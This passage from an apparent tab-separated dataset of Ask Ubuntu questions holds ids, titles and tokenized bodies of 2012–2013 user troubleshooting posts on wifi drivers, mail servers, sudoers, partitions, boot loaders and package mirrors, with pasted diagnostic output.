ntfs mft . i use deep search in analize it run more than 30 hours but i waiting and the result is no partition available.hurt ... ... .. please help me ... ... ... ... ... ... ... . last i use photorec , and ca n't list folder and file ... ... . =============================================== anyone know to solve my problem ? i want get all my data , please ... .. i searching how but not found anything until now
243734	what is a ubuntu point release ? how many point releases will ubuntu 12.04 have ?	i saw on planet ubuntu that there is a new point release coming out soon for ubuntu 12.04.1 . what is a point release ? how often to these updates come out ? are they upgrades to the kernel version ? or just packages ? will the system perform better after a point release ?
243736	wireless on lenovo g580	i just brought a brand new gorgeous lenovo g580 and ... i ca n't connect it to the internet because ubuntu 12 will not recognise the proper wireless card driver . can anyone offer me a solution ? thanks in advance . this is what you asked for . a bit long , though . thanks again : contra @ contra-lenovo-g580 : ~ $ sudo lshw -c network [ sudo ] password for contra : no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory *-network descripción : ethernet interface producto : ar8162 fast ethernet fabricante : qualcomm atheros id físico : 0 información del bus : pci @ 0000:01:00.0 nombre lógico : eth1 versión : 10 serie : b8:88 : e3:93:54 : d0 capacidad : 100mbit/s anchura : 64 bits reloj : 33mhz capacidades : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuración : autonegotiation=on broadcast=yes driver=alx latency=0 link=no multicast=yes port=twisted pair recursos : irq:47 memoria : e0500000-e053ffff ioport:2000 ( size=128 ) *-network descripción : interfaz inalámbrica producto : bcm4313 802.11bgn wireless network adapter fabricante : broadcom corporation id físico : 0 información del bus : pci @ 0000:02:00.0 nombre lógico : wlan0 versión : 01 serie : c0:14:3d : d4:34:23 anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress bus_master cap_list ethernet physical wireless configuración : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) latency=0 multicast=yes wireless=ieee 802.11abg recursos : irq:17 memoria : e0400000-e0403fff contra @ contra-lenovo-g580 : ~ $ contra @ contra-lenovo-g580 : ~ $ lsmod module size used by lib80211_crypt_tkip 17619 0 wl 4207846 0 lib80211 14381 2 wl , lib80211_crypt_tkip alx 32452 0 mdio 13807 1 alx snd_hrtimer 12744 1 cuse 13445 3 rfcomm 69160 0 bnep 19624 2 binfmt_misc 17468 1 snd_hda_codec_hdmi 46207 1 snd_hda_codec_conexant 57441 1 arc4 12608 2 rt2800usb 27034 0 rt2x00usb 20742 1 rt2800usb rt2800lib 89076 1 rt2800usb rt2x00lib 55307 3 rt2x00usb , rt2800lib , rt2800usb mac80211 626489 3 rt2x00lib , rt2x00usb , rt2800lib cfg80211 484040 3 wl , mac80211 , rt2x00lib btusb 32412 0 uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo bluetooth 395423 12 bnep , btusb , rfcomm videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core crc_ccitt 12707 1 rt2800lib rts5139 335409 0 parport_pc 32701 0 ppdev 17671 0 snd_hda_intel 52355 6 snd_hda_codec 192906 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm 451511 0 snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 snd_seq_midi 13324 0 ghash_clmulni_intel 13259 0 snd_seq_midi_event 14899 1 snd_seq_midi aesni_intel 55624 0 snd_rawmidi 30144 1 snd_seq_midi aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20359 3 ghash_clmulni_intel , aesni_intel , ablk_helper joydev 17381 0 snd_seq 61560 3 snd_seq_midi_event , snd_seq_midi serio_raw 13462 0 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 3 snd_hrtimer , snd_pcm , snd_seq snd 69238 25 snd_hrtimer , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi i915 783485 4 drm_kms_helper 52758 1 i915 drm 302817 5 i915 , drm_kms_helper lpc_ich 21080 0 mei_me 18627 0 mei 82274 1 mei_me soundcore 12680 1 snd i2c_algo_bit 13413 1 i915 ideapad_laptop 18216 0 sparse_keymap 13948 1 ideapad_laptop video 19476 1 i915 mac_hid 13205 0 ndiswrapper 283985 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc psmouse 102222 0 ahci 25819 2 libahci 32168 1 ahci contra @ contra-lenovo-g580 : ~ $ contra @ contra-lenovo-g580 : ~ $ rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : yes hard blocked : no 6 : hci0 : bluetooth soft blocked : no hard blocked : no 9 : phy3 : wireless lan soft blocked : no hard blocked : no 10 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 11 : phy4 : wireless lan soft blocked : no hard blocked : no contra @ contra-lenovo-g580 : ~ $
243738	what causes these error messages when trying to open libreoffice writer ?	after reinstalling ubuntu 12.10 ( due to a boot problem ) , each time i open libreoffice writer [ version 3.6.2.2 ( build id : 360m1 ( build:2 ) ) ] , two error messages pop up , both stating error loading basic of document the first : file : ///home/ariel/.config/libreoffice/3/user/basic/standard/script.xlb/ : general error . general input/output error . the second : file : ///home/ariel/.config/libreoffice/3/user/basic/standard/dialog.xlb/ : general error . general input/output error . what is the cause of these messages and how can i correct them ?
243740	making up cacher server for older ubuntu releases	we have ubuntu 10.04 and ubuntu 10.10 operating systems . however our software works only in these versions . we are facing some problems in the new versions 12.04 ( lts ) we are working in it . but temporarily we need to setup a cacher server to install basic packages in these versions like samba , thunderbird , ssh ang plugins etc.. any possibility 's ? i already know that these versions has reached end of support . but we only prefer these versions , as it has a classic-gnome . we are working to upgrade our softwares , so that we are in-need of a temporary solution . thought of setting up apt-mirror , but it consumes more bandwidth , for every release we need to download 85 gb 's of datas , which is quite difficult and it takes lot of time . hope there is some better trick to acheive this task . update : any way to setup apt-mirror with needed packages ? ? instead of downloading the whole mirror ? we require only samba , ssh , thunderbird , flashplugin-installer and all additional plugins . for installing this packages , setting up a complete mirror of 85 gb per distribution is really waste . we are already using apt-cacher-ng server . i am able to install packages for ubuntu 10.04 but installing packages in ubuntu 10.10 throws 404 error . any way to fix this ? ?
243749	i want to copy update files from an already updated machine to a machine with super slow internt . can i do this and how ?	i have a machine that i have updated online with a faster internet connection . i am now in a location where the connection speed is horrible . can i move the files from the updated machine to the not updated one ? sorry i am new to ubuntu .
243751	how are key codes mapped to the appropriate action ?	after figuring out how to change the mapping of scan codes to key codes using udev , see this question , i was wondering how those key codes ( or events if you will ) are mapped to the appropriate action . so , for example , if you press volume up on your keyboard , a scan code is sent which will then be converted to the volumeup key code . but how is this key code intercepted , the volume turned up , and the appropriate notification displayed ? my guess is that somewhere a script must be called , so i 'd like to know where those scripts are . edit : the key codes i mention are not to be confused with the key codes xev returns , but i am also interested in those ; )
243754	any tips or software to increase battery life ?	when i use windows my battery is giving about 4.30 hours backup , but on ubuntu it gets discharged in 1.30 to 2.00 hours only . so please suggest any software or tips to increase battery life on ubuntu .
243755	i need specific direction : i have a windows 7 formatted partition of 30g- completely empty and wan na know how to install ubuntu-	if i understand correctly , it will not recognize the ntsf file system ... . so should i delete that partition ? then ... 1. create new unformatted partition.. 2. do i wipe it completely clean , as no files on it ? ( the windows installer that i downloaded is a tar file so how can i run it with no os on that partition ? ) 3.when i finally get it install , it will make the needed partition , right ? or ... do i run the .tar from my current windows desktop..then install it to the freshly `` un-partitioned '' drive ... . i am using windows home premium7 sp1 amd e-300 apu with radeon ( tm ) hd graphics 1.30 4gb ram 64gb os i am not really a n00b , just walking in a new area ... and i want to get it right the first time if possible ... so i ask for a 1,2,3 direct step info if possible . i appreciate the time you take out of your day to append this issue ... if you are able to , email me with a reply since i am not sure if there is an alert mail sent when a reply is posted in this forum . matthew3041230 @ gmail.com much obliged -- - matthew * . c. lcpl u.s.m.c .
243757	how to migrate from raidz1 to raidz2 using zfs-native ?	last night i created a raidz1 array , however later in the evening i realised i needed to create a raidz2 ( raid5 ) , is it possible to change the raid level of my array from raidz1 to raidz2 without destroying the data on the drives ?
243758	ca n't send emails from the terminal	i setup a basic email sending only server on my laptop using the following sudo tasksel install mail-server but for some reason i did n't get asked what kind of installation i want to do , i.e . a localhost only , internet etc etc i used the following command to send an email from the terminal echo 'body ' | sendmail oshirowanen @ gmail.com i did not receive the email . i checked both my inbox and spam box . plus i do n't have a firewall , so no rules would have blocked the email going out . unless of-course , ubuntu by default has a necessary port closed which is needed for sending emails out ? the mail.log is showing the following and the log is getting bigger and bigger : jan 16 09:21:04 ubuntu postfix/master [ 5923 ] : daemon started -- version 2.9.3 , configuration /etc/postfix jan 16 09:21:04 ubuntu postfix/qmgr [ 5925 ] : es8b132738 : from= < oshirowanen @ ubuntu > , size=233 , nrcpt=1 ( queue active ) jan 16 09:21:09 ubuntu postfix/smtp [ 5927 ] : connect to gmail-smtp-in.l.google.com [ 2a00:1450:400c : c05 : :1a ] :25 : network is unreachable jan 16 09:21:27 ubuntu dovecot : master : dovecot v2.0.19 starting up ( core dumps disabled ) jan 16 09:21:39 ubuntu postfix/smtp [ 5927 ] : connect to gmail-smtp-in.l.google.com [ 173.194.67.27 ] :25 : connection timed out jan 16 09:22:09 ubuntu postfix/smtp [ 5927 ] : connect to alt1.gmail-smtp-in.l.google.com [ 173.194.70.26 ] :25 : connection timed out jan 16 09:22:09 ubuntu postfix/smtp [ 5927 ] : connect to alt1.gmail-smtp-in.l.google.com [ 2a00:1450:4001 : c02 : :1b ] :25 : network is unreachable jan 16 09:22:39 ubuntu postfix/smtp [ 5927 ] : connect to alt2.gmail-smtp-in.l.google.com [ 173.194.69.26 ] :25 : connection timed out jan 16 09:22:39 ubuntu postfix/smtp [ 5927 ] : es8b132738 : to= < oshirowanen @ gmail.com > , relay=none , delay=1547 , delays=1452/0.05/95/0 , dsn=4.4.1 , status=deferred ( connect to alt2.gmail-smtp-in.l.google.com [ 173.194.69.26 ] :25 : connection timed out ) how do i stop my laptop trying to send the email , and how do i setup the mail-server properly . i just want to be able to send emails out so i can use php to send emails out . i do not need to receive emails in .
243759	how do i remove any data from a liveusb with data persistence ?	i have miss-configured my liveusb installation and now when i run boot from it i get an error . how can i erase liveusb data ? can it be done from the booting liveusb menu ? for some weird reason livecd remembers the state between runs . that is a very cool feature , but i need to reset all that data . i have problem with mbr on my hard drive and i want to install ubuntu , however i ca n't since booting from cd has now its own problems . when i run the liveusb i get an error right away . i do n't have option to install ubuntu . after waiting 20 minutes i get an option to log in into ubuntu .
243761	being asked for password inspite of changing the sudoers file	i have included the following in the sudoers file using the visudo command training all= ( all ) nopasswd : all and training is part of the sudo group training @ slave1 : ~ $ id uid=1000 ( training ) gid=1000 ( training ) groups=1000 ( training ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,111 ( lpadmin ) ,112 ( sambashare ) ,1001 ( vboxsf ) but , still i am prompted for the password when i run sudo ls . how to get around this problem ? i would like the training user to install software without being prompted for a password . i have installed ubuntu server 12.04 and using cloudera manager to install hadoop on that node and one of the requirement is shown below . i am able to do ssh , but sudo without a password is not working root access to your hosts is required to install the cloudera packages . this installer will connect to your hosts via ssh and log in either directly as root or as another user with password-less sudo privileges to become root .
243762	install open icon library in ubuntu 10.04	i download open icon library from http : //openiconlibrary.sourceforge.net/ so , how can i install it in ubuntu 10.04 ? ?
243768	where can i find gedit 's backup files and how to open them ?	so , i just finished off the first part of an important task for school and today when i was going to continue , the document with my notes were gone . the only fragment i 've got left of my file is the back up file , which does n't show in the folder where i saved the document , but i can search for it . is there anyway which allows me to open the back up file , save it as a text file and continue my task ? i do n't really have the time for running restoring tools , which never has helped me in a satisfactory way anyway . i wrote the document in gedit and my version of ubuntu is 12.10 .
243775	what does totem 's thumbnailer do with mp3s ?	i copied a ton of mp3s onto a usb stick tonight and noticed : i could n't umount because totem-video-thumbnailer was busy processing the mp3s and each file was taking forever to process and no network traffic was happening a fair amount of cpu was being used what gives ? if it 's pulling artwork from id3 , then it should be speedy . if pulling from the 'net , it should have traffic and not use cpu ( maybe slow if e.g . waiting for response/dns/whatever ) . so what 's the thumbnailer doing on mp3 files ? i can understand a fair amount of work processing videos , but audio files ?
243783	compiling oggvideotools 0.9 on ubuntu 12.04	i 'm trying to compile oggvideotools 0.9 on ubuntu 12.04 server ( 0.8 is in the ubuntu repos , but i want the current 0.9 trunk version ) svn co https : //oggvideotools.svn.sourceforge.net/svnroot/oggvideotools oggvideotools cd oggvideotools/trunk ./autogen.sh and here is what i get : system has changed to run under cmake -- the c compiler identification is gnu -- the cxx compiler identification is gnu -- check for working c compiler : /usr/bin/gcc -- check for working c compiler : /usr/bin/gcc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done -- check for working cxx compiler : /usr/bin/c++ -- check for working cxx compiler : /usr/bin/c++ -- works -- detecting cxx compiler abi info -- detecting cxx compiler abi info - done -- looking for include files have_bzero_h -- looking for include files have_bzero_h - not found . -- looking for include files have_stdint_h -- looking for include files have_stdint_h - found -- checking for module 'theoradec > =1.1' -- found theoradec , version 1.1.1 -- checking for module 'theoraenc > =1.1' -- found theoraenc , version 1.1.1 -- checking for module 'vorbis > =1.2.3' -- found vorbis , version 1.3.2 -- checking for module 'vorbisenc > =1.2.3' -- found vorbisenc , version 1.3.2 -- checking for module 'ogg > =1.1.0' -- found ogg , version 1.2.2 -- theora encoder library found -- theora decoder library found -- vorbis library found -- vorbis encoder library found -- ogg library found -- gd library and header found creating config.h libraries are : theoraenc ; theoradec ; ogg ; theoradec ; ogg ; vorbis ; m ; ogg ; vorbisenc ; vorbis ; m ; ogg ; ogg ; gd_library-notfound cmake error : the following variables are used in this project , but they are set to notfound . please set them or make sure they are set and tested correctly in the cmake files : gd_include used as include directory in directory /var/www/doc.topcleanpackaging.com/extensions/oggvideotools/trunk used as include directory in directory /var/www/doc.topcleanpackaging.com/extensions/oggvideotools/trunk/src used as include directory in directory /var/www/doc.topcleanpackaging.com/extensions/oggvideotools/trunk/docs used as include directory in directory /var/www/doc.topcleanpackaging.com/extensions/oggvideotools/trunk/scripts gd_library linked by target `` oggvideotools '' in directory /var/www/doc.topcleanpackaging.com/extensions/oggvideotools/trunk/src it seems i 've well installed all dependencies..but stil not compiling . do you have the same issues ? thank you .
243787	why py and not pyc or pyo ?	when i install a python deb package , say python-numpy the files are plain python files . how do i tell to the package manager -- that i actually would rather use pyc or even better -- pyo files ?
243789	ca n't get bootloader to work using easybcd	when rebooting the computer , only windows 8 will be visible in bootloader . computer : hp envy 17 os 1 : ubuntu 12.10 32 bit os 2 : windows 8 64 bit disk partitions on system : ( data from windows disk management ) disk 1 is a ssd **disk 0 dynamic 596,17 gb** volum : system , type : dynamic , filesystem : ntfs , status : ok ( system ) , capacity : 199 mb volum : ( d : ) , type : dynamic , filesystem : ntfs , status : ok , capacity : 595,97 gb **disk 1 default 223,57 gb** volum : system ( m : ) , type : default , filesystem : ntfs , status : ok ( active , primary partition ) , capacity : 199 mb volum : ( c : ) , type : default , filesystem : ntfs , status : ok ( startup , primary partition ) , capacity : 166,42 gb volum : , type : default , filesystem : , status : ok ( primary partition ) , capacity : 51,00 gb volum : , type : default , filesystem : , status : ok ( primary partition ) , capacity : 5,95 gb ubuntu is installed on the 51,00 gb partition . windows is istalled on the 166,42 gb partition ( c : ) . pasted from easybcd : there are a total of 2 entries listed in the bootloader . default : windows 8 timeout : 5 seconds easybcd boot device : d : \ entry # 1 name : windows 8 bcd id : { current } drive : c : \ bootloader path : \windows\system32\winload.exe entry # 2 name : neosmart linux bcd id : { f3b2e917-5e47-11e2-be84-cc52af78aa22 } device : unknown bootloader path : \nst\autoneogrub0.mbr
243791	messed up swap on clean install of xubuntu 12.10	i did a clean install 32 bit xubuntu using manual partitioning on 1tb drive . the swap partition is missing and the large lvm size can not be changed using gparted . i want to reduce the size in order to create a 4 gb swap partion . must i wipe the drive and repartition the entire ? hereis my fdisk . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b367a device boot start end blocks id system /dev/sda1 * 2048 462847 230400 83 linux /dev/sda2 501758 1953523711 976510977 5 extended /dev/sda3 462848 499711 18432 83 linux /dev/sda5 501760 1953523711 976510976 8e linux lvm partition table entries are not in disk order disk /dev/sdb : 4007 mb , 4007264256 bytes 124 heads , 62 sectors/track , 1018 cylinders , total 7826688 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000babde device boot start end blocks id system /dev/sdb1 * 62 7826383 3913161 7 hpfs/ntfs/exfat disk /dev/mapper/xubuntu-root : 998.9 gb , 998894469120 bytes 255 heads , 63 sectors/track , 121442 cylinders , total 1950965760 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/xubuntu-root does n't contain a valid partition table disk /dev/mapper/xubuntu-swap_1 : 1002 mb , 1002438656 bytes 255 heads , 63 sectors/track , 121 cylinders , total 1957888 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/xubuntu-swap_1 does n't contain a valid partition table bud @ bud-desktop : ~ $
243796	how to diagnose problems with internet radio stations ?	i 'm trying to listen to the internet radio station at http : //s11.myradiostream.com:32034/ . i 've tried adding this using the `` new internet radio station '' dialog ( via ctrl-i ) , however i hear nothing , and there 's no feedback to indicate what 's going on . ( i was expecting an error message , new radio station appearing in the `` library '' list on the left , etc . ) the same internet radio station works fine with banshee , so i do n't think it 's a problem with the stream itself . how can i diagnose this problem ?
243799	can i rearrange the messaging menu list ?	this is my current messaging menu layout in ubuntu 12.10 : i was wondering is there a way to change the list ? i would rather have thunderbird moved to the bottom . i tried uninstalling thunderbird , which removed it from the list , but when i reinstalled it thunderbird went back into that position . it seems the layout is set as you set-up the applications the first time which made me think there is something somewhere which defines how they are ordered in the list . any help would be great !
243801	ca n't discover wifi network on my macbook air upon first reboot after installation	i recently installed ubuntu 12.10 on my macbook air 2008 . installation went smoothly and i even managed to install other programs , and to navigate on the internet . after the first reboot i got a notification : network - disconnected you are now offline . and from this point on , i ca n't access any network ! i 've read a few posts , but nothing seems to help . i ca n't connect an ethernet cable ( macbook air does n't have it ) . so what should i do ? thanks in advance , antonio
243805	hide certain files and folders ?	selected files/folders : i do n't know who these files belong to , but i 'm afraid deleting them might cause something to break . how do i hide these files and folders so that they do not appear in nautilus , but they are accessible by windows , if they belong to it . i have seen some guides where each file and folder to be hidden is prepended by a period ( . ) , but that would change the file name , which may or may not break something .
243808	amd-intel hybrid graphics : problem	my laptop is an hp dv6 6121tx with 2 gpus : an integrated intel one and an amd hd6770m . now i just want to run ubuntu on it without getting horrendous battery life and without it getting very hot after a few minutes . my bios has 2 options regarding this : fixed switching and dynamic switching . in fixed mode , in windows , i could manually choose which gpu to run my system on . in dynamic , in windows , i could choose which apps would run on which gpu , switching was seamless . now i do n't mind running linux on any of these modes , i do n't even require my amd gpu for anything , i just do some general coding on linux here and there . so here 's my question . what should i do to run my system on the integrated intel gpu ? very importantly please also mention that whatever method you suggest is for fixed mode or dynamic mode . ( ubuntu 12.10 )
243812	how to troubleshoot wifi ( bcm4313 ) problems with lenovo g580 ?	yes , there are lot of same problems , and i read at least 15 forum posts . but no result . os : 12.10 i have similar problem like this thread , so after updating to a new kernel , the wifi gone . : wireless problems with broadcom bcm4313 but downloading and installing the .deb package , what dimitar linked , did n't solved it . the wl.ko file is in the /lib/modules/3.5.0-21-generic/updates/dkms/ folder . running the reinstall command , gives the following : ( sudo apt-get -- reinstall install bcmwl-kernel-source from the offical guide ) reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : calligra-l10n-engb cdparanoia k3b k3b-data k3b-i18n kde-l10n-engb kde-l10n-zhcn kdevelop-l10n kdevelop-php-docs-l10n kdevelop-php-l10n language-pack-kde-en libasprintf0c2 : i386 libcroco3 : i386 libflac++6 libgettextpo0 : i386 libgomp1 : i386 libk3b6 libkcddb4 libunistring0 : i386 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 1 not upgraded . need to get 0 b/1,181 kb of archives . after this operation , 0 b of additional disk space will be used . ( reading database ... 202169 files and directories currently installed . ) preparing to replace bcmwl-kernel-source 5.100.82.112+bdcom-0ubuntu3 ( using ... /bcmwl-kernel-source_5.100.82.112+bdcom-0ubuntu3_amd64.deb ) ... removing all dkms modules done . unpacking replacement bcmwl-kernel-source ... setting up bcmwl-kernel-source ( 5.100.82.112+bdcom-0ubuntu3 ) ... loading new bcmwl-5.100.82.112+bdcom dkms files ... building only for 3.5.0-21-generic building for architecture x86_64 building initial module for 3.5.0-21-generic done . wl : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.5.0-21-generic/updates/dkms/ depmod ... . dkms : install completed . error : module b43 does not exist in /proc/modules error : module b43legacy does not exist in /proc/modules error : module ssb does not exist in /proc/modules error : module bcm43xx does not exist in /proc/modules error : module brcm80211 does not exist in /proc/modules error : module brcmfmac does not exist in /proc/modules error : module brcmsmac does not exist in /proc/modules error : module bcma does not exist in /proc/modules fatal : error inserting wl ( /lib/modules/3.5.0-21-generic/updates/dkms/wl.ko ) : invalid argument update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-21-generic more tests : lspci -vvnn | grep 14e4 : 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0587 ] iwconfig : eth1 no wireless extensions . lo no wireless extensions . rfkill list all : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no lsmod : module size used by nls_iso8859_1 12713 1 rfcomm 42651 0 bnep 18140 2 parport_pc 32688 0 ppdev 17073 0 bluetooth 204950 10 rfcomm , bnep ip6t_reject 12574 1 usb_storage 48838 1 uas 17844 0 xt_hl 12521 6 ip6t_rt 12558 3 nf_conntrack_ipv6 14054 7 nf_defrag_ipv6 13158 1 nf_conntrack_ipv6 ipt_reject 12541 1 xt_log 17349 10 xt_limit 12711 13 xt_tcpudp 12603 18 snd_hda_codec_hdmi 32007 1 snd_hda_codec_conexant 57842 1 xt_addrtype 12635 4 binfmt_misc 17500 1 xt_state 12578 14 ip6table_filter 12815 1 ip6_tables 27207 2 ip6t_rt , ip6table_filter nf_conntrack_netbios_ns 12665 0 nouveau 895609 0 nf_conntrack_broadcast 12589 1 nf_conntrack_netbios_ns nf_nat_ftp 12649 0 nf_nat 25254 1 nf_nat_ftp nf_conntrack_ipv4 14480 9 nf_nat nf_defrag_ipv4 12729 1 nf_conntrack_ipv4 nf_conntrack_ftp 13359 1 nf_nat_ftp nf_conntrack 82633 8 nf_conntrack_ipv6 , xt_state , nf_conntrack_netbios_ns , nf_conntrack_broadcast , nf_nat_ftp , nf_nat , nf_conntrack_ipv4 , nf_conntrack_ftp uvcvideo 76749 0 iptable_filter 12810 1 ip_tables 26995 1 iptable_filter coretemp 13400 0 videobuf2_core 32851 1 uvcvideo videodev 120309 2 uvcvideo , videobuf2_core snd_hda_intel 33491 3 snd_hda_codec 134212 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel i915 520539 3 videobuf2_vmalloc 12860 1 uvcvideo joydev 17457 0 x_tables 29711 13 ip6t_reject , xt_hl , ip6t_rt , ipt_reject , xt_log , xt_limit , xt_tcpudp , xt_addrtype , xt_state , ip6table_filter , ip6_tables , iptable_filter , ip_tables videobuf2_memops 13368 1 videobuf2_vmalloc ttm 83595 1 nouveau kvm 414070 0 snd_hwdep 13602 1 snd_hda_codec rts5139 356158 0 snd_pcm 96580 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec drm_kms_helper 49112 2 nouveau , i915 alx 81256 0 lib80211 14381 0 compat 14949 5 rfcomm , bnep , bluetooth , alx , lib80211 ghash_clmulni_intel 13180 0 drm 288670 6 nouveau , i915 , ttm , drm_kms_helper snd_seq_midi 13324 0 snd_rawmidi 30512 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61521 2 snd_seq_midi , snd_seq_midi_event snd_timer 29425 2 snd_pcm , snd_seq snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq mei 40690 0 mxm_wmi 12979 1 nouveau snd 78734 16 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device psmouse 95552 0 ideapad_laptop 18086 0 wmi 19070 2 nouveau , mxm_wmi lpc_ich 17061 0 i2c_algo_bit 13413 2 nouveau , i915 serio_raw 13215 0 sparse_keymap 13890 1 ideapad_laptop mac_hid 13205 0 soundcore 15047 1 snd snd_page_alloc 18484 2 snd_hda_intel , snd_pcm cryptd 20403 1 ghash_clmulni_intel video 19335 2 nouveau , i915 microcode 22803 0 lp 17759 0 parport 46345 3 parport_pc , ppdev , lp
243813	triple screen setup with 2 nvidia graficcards fails - lightdm does n't feel responsible for the third screen	i have 2 videocards a quadro fx 380 and a geforce 580 . i want to connect 2 1920x1200 and a 2560x2540 screen to it . i use precise and the xswat ppa with newest nvidia proprietary drivers . the built-in ubuntu display tool just gives me an option to configure 2 screens on the same card . if i use the nvidia tool it sees all screens and i can turn on the third display ( on the second videocard ) . i do n't have an option to `` twinview '' this display . i just can configure a new xscreen ( twinview is greyed out ) . this works but lightdm does n't feel responsible for that screen . it 's just white and a simple xserver with typical `` x '' mouse pointer . the other 2 displays work as expected . there are so many contradicting posts . some say lightdm ca n't handle 2 xsreens . is this still the case ? what am i doing wrong . do i need to use another window manager ? thank you for your time .
243814	how can i use mysql command line client in ubuntu 12.04 ?	i just upgraded ubuntu 11.10 to 12.04 ( installed within windows 7 ) and during installation the process asked me to set my mysql root password . according to ubuntu documentation , mysql server is pre-istalled in ubuntu version 12.04 . however , when i search for `` mysql command line client '' in the dash home , the following files are shown : mysql 5.5 command line client.lnk qa_auth client.dll mysqlclient.lib client plugin.h when i open the first option on the list ( mysql 5.5 command line client.lnk ) , the following two error messages are shown : path not found there is no windows program configured to run this type of file . the other 3 options are of no help too . please help by explaining to me how can i use mysql command line client ( the cui for mysql ) in my ubuntu version ?
243816	ubuntu 12.04 printing problem on lexmark x340	after upgrading from ubuntu 11.10 to 12.04 , i have printing issues with lexmark x340 : printing from libre office or a pdf file : if the document is more complex ( longer than 2 pages ) , the first page is printed correctly , followed by several of pages with some hieroglyphics . this can only be stopped by switching the printer off and then on again . in case of simple documents , the first print usually comes out ok. then , if another print is requested , the story begins again : unwanted characters , on many pages . to overcome this problem , i now do the following : print a document , switch the printer off and back on , print again , and so on ... does anyone has a fix ?
243823	shotwell develop raw files on import	in the preferences one can set the default raw developer , leading to each raw beeing developed the first time opened . however i am able to force the development process if i manually switch the raw developer for selected photos , thus getting developed versions of each selected image . is it possible to develop images using the default raw developer on import ? or do i need to keep using my dirty ( and expensive ) trick ? kind regards
243826	i need to install the intel hd 3000 video driver in my pc which is running ubuntu 12.10	i installed in a oem machine the new ubuntu 12.10 but it seems the hd 2000/3000 accelerator is not installed . how can install it ?
243831	how to make recoll search or locate folder only not the files	how to make recoll list only folder or directory names instead of files ? or how to filter category to only search for directory names not directory contents ( files ) ? many times , i can only remember the folder 's name not the file names . thank you for your help .
243832	how do i get winetricks dotnet20 to work on ubuntu 12.10 amd64 with wine 1.4 ?	i followed the question about installing dotnetfx.exe ( net 2.0 ) for wine by using winetricks dotnet20 which , because i have ubuntu 12.10 amd64 , downloaded the 64-bit executable instead , which i thought would make no difference right ? well the install goes fine at first , unpacks , asks me to accept license , and starts the install.. but then just fails with error code 36.. of course making winetricks abort ... anyone ever get dotnet 2.0 to work on wine 1.4 with ubuntu 12.10 amd64-bit system ? if so , how did you do it ? did you have any problems ? workarounds ? thanks in advance ... i 've heard dotnet20 does not work on amd64 arch , and that i need to make wine run win32 arch instead , is this correct ? if so , how ? i am a windows user that is transitioning to ubuntu linux 12.10 and all this is still pretty new to me , any help would be great .
243833	ubuntu 12.10 server and phpmyadmin	i have installed mysql service and phpmyadmin also lamp i tested the pages and it looks as if the server is setup but when i try to access phpmyadmin i cant access it i get error that says page not found error 401
